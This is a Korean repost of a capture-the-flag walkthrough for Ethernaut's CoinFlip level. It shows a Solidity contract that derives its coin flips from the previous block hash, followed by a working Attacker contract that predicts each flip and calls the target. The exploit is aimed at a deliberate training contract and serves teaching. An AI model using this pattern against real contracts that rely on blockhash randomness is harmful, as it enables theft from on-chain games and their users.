Ethernaut: 3. 코인플립
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import '@openzeppelin/contracts/math/SafeMath.sol';
contract CoinFlip {
using SafeMath for uint256;
uint256 public consecutiveWins;
uint256 lastHash;
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
constructor() public {
consecutiveWins = 0;
}
function flip(bool _guess) public returns (bool) {
uint256 blockValue = uint256(blockhash(block.number.sub(1)));
if (lastHash == blockValue) {
revert();
}
lastHash = blockValue;
uint256 coinFlip = blockValue.div(FACTOR);
bool side = coinFlip == 1 ? true : false;
if (side == _guess) {
consecutiveWins++;
return true;
} else {
consecutiveWins = 0;
return false;
}
}
}
이 공격에서 우리는 계약에서 공격을 호출하여 가정된 "무작위"플립을 추측할 것입니다. 대상 계약은 각 블록에서 동전을 던지도록 프로그래밍되어 있으므로 우리가 추측하는 각 블록은 서로 다른 블록에 있어야 합니다.
계약서에
flip
기능을 복사하여 붙여넣은 다음 결과에 따라 실제 flip
기능을 호출할 수 있습니다. 다음은 항상 정확하게 추측하는 psychicFlip
함수를 사용한 공격 계약입니다.// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/math/SafeMath.sol";
// interface for target
interface CoinFlip {
function flip(bool _guess) external returns (bool);
}
contract Attacker {
CoinFlip coinflipTarget;
using SafeMath for uint256;
constructor(address _target) {
coinflipTarget = CoinFlip(_target);
}
function psychicFlip() public {
uint256 blockValue = uint256(blockhash(block.number.sub(1)));
uint256 coinFlip = blockValue.div(57896044618658097711785492504343953926634992332820282019728792003956564819968);
bool side = coinFlip == 1 ? true : false;
bool result = coinflipTarget.flip(side);
require(result, "Could not guess, abort mission.");
}
}
그게 다야!
Reference
이 문제에 관하여(Ethernaut: 3. 코인플립), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://dev.to/erhant/ethernaut-3-coinflip-4pcb텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)